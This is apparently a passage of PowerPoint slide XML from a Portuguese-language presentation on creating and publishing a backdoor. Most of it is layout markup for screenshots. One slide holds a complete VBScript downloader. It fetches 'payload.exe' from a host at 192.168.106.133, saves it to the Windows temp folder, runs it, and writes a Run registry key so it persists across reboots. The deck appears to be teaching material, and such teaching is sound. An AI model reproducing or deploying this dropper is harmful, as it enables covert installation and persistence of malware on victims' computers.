          <p:cNvPr id="15" name="Picture 14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937CDCF6-EEA1-0641-909C-57D622DE3D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06" t="5136" r="8211" b="7818"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379554" y="1237199"/>
            <a:ext cx="4208592" cy="3240000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B3B4035-6881-9B42-9237-0F3C943CD505}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426382" y="3525462"/>
            <a:ext cx="1335721" cy="12719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388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61689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Criando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1"/>
              <a:t>uma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t> Backdoor</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4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BF902C7D-399A-B04A-9166-05FD6F044A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92" t="5755" r="5057" b="9418"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426382" y="1236024"/>
            <a:ext cx="4114936" cy="3241175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6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F36BAECD-E33C-3248-B521-4BD1DCFD29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047" t="4233" r="14670" b="11746"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426382" y="1237199"/>
            <a:ext cx="4114936" cy="32400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87A80D2-84D8-354F-A465-6D435547149A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426382" y="3605349"/>
            <a:ext cx="1335721" cy="17417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99E85887-514D-A544-B7B8-DEE0BD6730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406" t="5136" r="8211" b="7818"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379554" y="1237199"/>
            <a:ext cx="4208592" cy="32400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8BA0A09-3A8C-4443-B038-28CD80D3510A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426382" y="3525462"/>
            <a:ext cx="1335721" cy="12719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9F7F073D-6DFE-0744-9D25-913E8980AAC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818" t="3556" r="10695" b="6489"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379554" y="1220067"/>
            <a:ext cx="4208592" cy="32400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1116F84-1E60-EB46-94C7-75994B473C3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426382" y="3617176"/>
            <a:ext cx="1335721" cy="1505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82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61689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Criando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1"/>
              <a:t>uma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t> Backdoor</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4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BF902C7D-399A-B04A-9166-05FD6F044A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92" t="5755" r="5057" b="9418"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426382" y="1236024"/>
            <a:ext cx="4114936" cy="3241175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6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F36BAECD-E33C-3248-B521-4BD1DCFD29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047" t="4233" r="14670" b="11746"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426382" y="1237199"/>
            <a:ext cx="4114936" cy="32400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87A80D2-84D8-354F-A465-6D435547149A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426382" y="3605349"/>
            <a:ext cx="1335721" cy="17417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99E85887-514D-A544-B7B8-DEE0BD6730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406" t="5136" r="8211" b="7818"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379554" y="1237199"/>
            <a:ext cx="4208592" cy="32400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8BA0A09-3A8C-4443-B038-28CD80D3510A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426382" y="3525462"/>
            <a:ext cx="1335721" cy="12719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9F7F073D-6DFE-0744-9D25-913E8980AAC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818" t="3556" r="10695" b="6489"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379554" y="1220067"/>
            <a:ext cx="4208592" cy="32400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1116F84-1E60-EB46-94C7-75994B473C3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426382" y="3617176"/>
            <a:ext cx="1335721" cy="1505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screenshot of a computer&#13;&#10;&#13;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B71B858-1B09-314F-AE5D-FD022EDFA01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544" t="3311" r="4704" b="6897"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379554" y="1220067"/>
            <a:ext cx="4208592" cy="324000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6E0C7CB-D007-FB41-B42B-D258715F3540}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2794316" y="4225550"/>
            <a:ext cx="2220685" cy="23451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755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61689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Criando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1"/>
              <a:t>uma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t> Backdoor</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14" descr="A screen shot of a computer&#13;&#10;&#13;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{076D3DBF-EA96-A944-B1B1-90D2F4EE1C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446" t="3666" r="11105" b="6905"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379554" y="1220067"/>
            <a:ext cx="4208592" cy="3240000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797014D-6467-114D-BAEB-0AD9BAFD1AA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426382" y="4225550"/>
            <a:ext cx="1994789" cy="16734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19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61689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Publicando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t> a Backdoor</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5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0660F3E5-662C-8F4B-97A7-E69F4445F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9" t="3482" r="2812" b="5430"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426382" y="1084082"/>
            <a:ext cx="4635332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61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Downloader.vbs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5508927" cy="4152406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="44450"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>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>dim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>xHttp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>: Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>xHttp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>createobject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>Microsoft.XMLHTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>dim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>bStrm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>: Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>bStrm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>createobject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>Adodb.Stream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>xHttp.Open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t> "GET", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>://192.168.106.133/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>payload.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>", False 'Endereço do download</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>xHttp.Send</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>bStrm</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>	.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t> = 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>	.open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>	.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>xHttp.responseBody</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>	.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>savetofile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>temp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>payload.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>", 2 'Caminho onde o arquivo será salvo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>WshShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>WScript.CreateObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>WScript.Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>WshShell.Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>temp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>payload.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>", 1, false 'Execução do arquivo baixado</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>Const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t> HKEY_LOCAL_MACHINE = &amp;H80000002</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>strComputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t> = "."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>objRegistry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>GetObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>winmgmts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>:\\" &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>strComputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t> &amp; "\root\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>default:StdRegProv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>objRegistry.SetStringValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t> HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>temp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0" err="1"/>
              <a:t>payload.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="700" b="1" i="1" dirty="0"/>
              <a:t>" 'Configurando para iniciar automaticamente no próximo boot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BAD5593-9A19-2A4D-81F7-EBACE327A637}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2754086" y="1545055"/>
            <a:ext cx="1817914" cy="25949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95C45AA-D1B8-4346-963A-D7AB3DC82C8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3113903" y="2851662"/>
            <a:ext cx="1545183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06B9181-E358-0D42-B0F2-B7D455F90BCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3388840" y="3588913"/>
            <a:ext cx="1389989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DA6EAD4-F30E-0048-BC49-CA94665DF13E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1870842" y="4525084"/>
            <a:ext cx="4355787" cy="25949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8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Conexão</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0" err="1"/>
              <a:t>Fechada</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a computer&#13;&#10;&#13;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9320518-D300-764E-9ACF-C1A41AD1A6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21" t="2933" r="3677" b="8362"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426383" y="1140644"/>
            <a:ext cx="4149648" cy="32400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556C1C9-A07E-0D46-BF0E-6A9BDE0AD430}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2426383" y="4128940"/>
            <a:ext cx="3795308" cy="16025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58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hape 542"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="1249589" y="653355"/>
            <a:ext cx="1027954" cy="111844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3" name="Shape 543"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2579543" y="52778"/>
            <a:ext cx="456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/>
              <a:t>Obrigado!</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="Shape 544"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2579543" y="1212578"/>
            <a:ext cx="5565973" cy="37377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/>
              <a:t>Onde você pode me encontrar:</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a: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</a:pPr>
            <a:r>
